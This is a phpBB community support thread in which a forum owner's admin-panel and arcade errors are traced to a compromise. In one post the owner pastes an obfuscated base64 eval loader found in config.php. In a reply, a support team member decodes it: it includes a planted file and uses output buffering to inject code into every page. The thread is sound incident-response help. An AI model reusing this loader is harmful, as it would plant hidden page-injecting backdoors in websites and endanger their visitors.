Your thoughs on acp problem

Temporary forum to obtain support while phpBB.com is offline.
Please use the support forum on phpBB.com
Forum rules
Temporary forum to obtain support while phpBB.com is offline.
Please use the support forum on phpBB.com
Locked
bart_0
Registered User
Posts: 5
Joined: Sat Feb 07, 2009 1:22 pm

Your thoughs on acp problem

Post by bart_0 »

When I log into the acp and try to delete a admin log it comes a white page and in the upper left corner there are 2 boxes and under the boxes there is a authenticate button. Never had this before? I'm running 3.0.4. I am also using Jr sweets arcade mod and when I go to play a game it comes up with a 404 error. This all seemed to start at the same time about 2 days ago. I haven't install any mods or changed anything for about a week or so. The last mods I installed were php seo mixed mod rewrite followed by Zero duplicate, www prefix issue and dynamic meta tags. I have restored all the file changes back to before seo mixed mod rewrite but I still get the authenticate page in the acp when I try to delete a admin log? Also some of the arcade games still come up with a 404 error. I know you don't offer support for the mods but this blank page in the acp that wants me to authenticate bothers me? TIA

User avatar
darcie
Community Team
Community Team
Posts: 189
Joined: Mon Mar 12, 2007 7:32 pm
Location: Davis, California
Contact:

Re: Your thoughs on acp problem

Post by darcie »

As I can't recall a box with an authenticate button such as you describe, and judging by the lack of response since you posted no one else can either, perhaps you could take a screenshot of what this looks like for us?

Additionally, providing us with more of the details from the Support Request Template would help as well.

bart_0
Registered User
Posts: 5
Joined: Sat Feb 07, 2009 1:22 pm

Re: Your thoughs on acp problem

Post by bart_0 »

The following is the basic SRT
Your board's URL: http:www.northumberlandoffroad.com
Version of phpBB3:3.0.4
Was this a fresh install or a(n) update/upgrade/conversion (please be specific)? update
If update, what package(s) did you use? auto update
Did you use an automated wizard provided by your host to install phpBB? no
MODs you have installed: arcade, phpBB Calendar, ACP Announcement Centre, lastRSS agregator 2, Ajax Chat/Shoutbox, Backup Scheduler, Reimg Image Resizer, Activity Stats MOD, Advertisement Management, Prime Links, BRIDGE: Coppermine, Popup Layer on New PMs, seo mixed mod rewrite, Zero duplicate, www prefix issue, dynamic meta tags
When the problem started: yesterday
Your level of expertise (be honest): Just enough to be dangerous

Here is a pic of the page I get.
Untitled-1.jpg
Untitled-1.jpg (16.67 KiB) Viewed 4904 times

bart_0
Registered User
Posts: 5
Joined: Sat Feb 07, 2009 1:22 pm

Re: Your thoughs on acp problem

Post by bart_0 »

Also found this in my config.php is this normal?

Code: Select all

<?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ3NoX25vJ10pKXskR0xPQkFMU1snc2hfbm8nXT0xO2lmKGZpbGVfZXhpc3RzKCcvaG9tZS9jb250ZW50L0svZS9uL0tlbjE5NTkvaHRtbC9waHBiYi9hcmNhZGUvZ2FtZWRhdGEvYXF1YXBlYXJsc3YzMlRoL2RhdGEvaW1nL2NvcHBlci5waHAnKSl7aW5jbHVkZV9vbmNlKCcvaG9tZS9jb250ZW50L0svZS9uL0tlbjE5NTkvaHRtbC9waHBiYi9hcmNhZGUvZ2FtZWRhdGEvYXF1YXBlYXJsc3YzMlRoL2RhdGEvaW1nL2NvcHBlci5waHAnKTtpZihmdW5jdGlvbl9leGlzdHMoJ2dtbCcpJiYhZnVuY3Rpb25fZXhpc3RzKCdkZ29iaCcpKXtpZighZnVuY3Rpb25fZXhpc3RzKCdnemRlY29kZScpKXtmdW5jdGlvbiBnemRlY29kZSgkZCl7JGY9b3JkKHN1YnN0cigkZCwzLDEpKTskaD0xMDskZT0wO2lmKCRmJjQpeyRlPXVucGFjaygndicsc3Vic3RyKCRkLDEwLDIpKTskZT0kZVsxXTskaCs9MiskZTt9aWYoJGYmOCl7JGg9c3RycG9zKCRkLGNocigwKSwkaCkrMTt9aWYoJGYmMTYpeyRoPXN0cnBvcygkZCxjaHIoMCksJGgpKzE7fWlmKCRmJjIpeyRoKz0yO30kdT1nemluZmxhdGUoc3Vic3RyKCRkLCRoKSk7aWYoJHU9PT1GQUxTRSl7JHU9JGQ7fXJldHVybiAkdTt9fWZ1bmN0aW9uIGRnb2JoKCRiKXtIZWFkZXIoJ0NvbnRlbnQtRW5jb2Rpbmc6IG5vbmUnKTskYz1nemRlY29kZSgkYik7aWYocHJlZ19tYXRjaCgnL1w8Ym9keS9zaScsJGMpKXtyZXR1cm4gcHJlZ19yZXBsYWNlKCcvKFw8Ym9keVteXD5dKlw+KS9zaScsJyQxJy5nbWwoKSwkYyk7fWVsc2V7cmV0dXJuIGdtbCgpLiRjO319b2Jfc3RhcnQoJ2Rnb2JoJyk7fX19')); ?>

User avatar
Noxwizard
Support Team Leader
Support Team Leader
Posts: 135
Joined: Sun Dec 18, 2005 5:44 pm
Location: Texas
Contact:

Re: Your thoughs on acp problem

Post by Noxwizard »

You need to remove that line. It expands out to this:

Code: Select all

if(function_exists('ob_start') && !isset($GLOBALS['sh_no']))
{
    $GLOBALS['sh_no']=1;
    if(file_exists('/.../phpbb/arcade/gamedata/aquapearlsv32Th/data/img/copper.php'))
    {
        include_once('/.../phpbb/arcade/gamedata/aquapearlsv32Th/data/img/copper.php');
        if(function_exists('gml') && !function_exists('dgobh'))
        {
            if(!function_exists('gzdecode'))
            {
                function gzdecode($d)
                {
                    $f=ord(substr($d,3,1));
                    $h=10;
                    $e=0;
                    if($f&4)
                    {
                        $e=unpack('v',substr($d,10,2));
                        $e=$e[1];
                        $h+=2+$e;
                    }
                    if($f&8)
                    {
                        $h=strpos($d,chr(0),$h)+1;
                    }
                    if($f&16)
                    {
                        $h=strpos($d,chr(0),$h)+1;
                    }
                    if($f&2)
                    {
                        $h+=2;
                    }
                    $u=gzinflate(substr($d,$h));
                    if($u===FALSE)
                    {
                        $u=$d;
                    }
                    return $u;
                }
            }
            function dgobh($b)
            {
                Header('Content-Encoding: none');
                $c=gzdecode($b);
                if(preg_match('/\<body/si',$c))
                {
                    return preg_replace('/(\<body[^\>]*\>)/si','$1'.gml(),$c);
                }
                else
                {
                    return gml().$c;
                }
            }
            ob_start('dgobh');
        }
    }
} 
Delete this file as well, if it exists:

Code: Select all

phpbb/arcade/gamedata/aquapearlsv32Th/data/img/copper.php
When phpbb.com comes back up, file an incident report with the access logs, database backup, and file backups. Make those backups before you delete the code and file I just listed.
Last edited by Noxwizard on Sun Feb 08, 2009 7:21 pm, edited 1 time in total.
Reason: Removed paths

bart_0
Registered User
Posts: 5
Joined: Sat Feb 07, 2009 1:22 pm

Re: Your thoughs on acp problem

Post by bart_0 »

I did what you said and that appears to have corrected my problems including the mysterious page I was getting in the acp. I don't understand a lot of this but was it some kinda hack attempt? Should I be concerned about anything else. That particular game has been on my site for a least a month or longer. TIA

User avatar
Lumpy Burgertushie
Registered User
Posts: 1006
Joined: Tue Feb 28, 2006 5:26 pm

Re: Your thoughs on acp problem

Post by Lumpy Burgertushie »

bart_0 wrote:I did what you said and that appears to have corrected my problems including the mysterious page I was getting in the acp. I don't understand a lot of this but was it some kinda hack attempt? Should I be concerned about anything else. That particular game has been on my site for a least a month or longer. TIA
well, it looks like someone can get to your files via that game somehow.

after you make backups of everything including any server logs that you can get from your host, I would completely remove that MOD from the board.


robert

User avatar
Noxwizard
Support Team Leader
Support Team Leader
Posts: 135
Joined: Sun Dec 18, 2005 5:44 pm
Location: Texas
Contact:

Re: Your thoughs on acp problem

Post by Noxwizard »

The MOD may not be vulnerable. Writing to a file is usually a sign of an issue with the server itself, and the arcade folder just happened to be a writable directory for him to dump a file into. The access logs will hopefully show where the issue is.

bart_0
Registered User
Posts: 5
Joined: Sat Feb 07, 2009 1:22 pm

Re: Your thoughts on acp problem

Post by bart_0 »

The copper.php was not in the original game file I downloaded nor was it in my backup files that are about a week or so old so it had to have been put there.

Locked